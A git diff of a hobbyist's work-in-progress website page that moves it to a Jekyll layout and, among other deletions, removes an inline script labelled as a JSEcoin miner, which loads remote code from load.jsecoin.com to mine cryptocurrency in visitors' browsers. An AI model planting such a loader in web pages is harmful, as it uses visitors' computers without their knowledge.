--- a/test.html
+++ b/test.html
@@ -1,7 +1,8 @@
-{% include header.html %}
-{% include index.html %}
-		
-		<main>
+---
+title: Test
+layout: default
+---
+
 		<h2>This site is a work in progress.</h2>
 		<p>Thanks for your interest in my project.</p>
 		<p>This whole thing is being developed live, (and all by hand!) so don't expect the same site to still be up an hour from now -- or for the site to be up at all ;-)</p>
@@ -10,17 +11,3 @@
 		<p>I also made this nifty Pokemon box list spreadsheet, I'll try to keep it semi-updated: <a href="box-list" target="_blank" class="link">box list</a>
 		<p>While you're waiting, check out my SoundCloud playlist:</p>
 		<iframe width="100%" height="450" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/playlists/673562202&color=%234da3d4&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true" alt="<a href="https://soundcloud.com/anders-meadwell/sets/play_next" style="margin-left: 20px;"></iframe>
-		</main>
-		
-		<footer>
-			<hr>
-			<p>&copy 2018 Anders Meadwell</p>
-		</footer>
-		
-		<!-- this is JSEcoin miner -->
-		<script type="text/javascript">
-			!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/103615/protracker.tk/0/0/",s.parentNode.insertBefore(t,s)}();
-		</script>
-		
-	</body>
-</html>
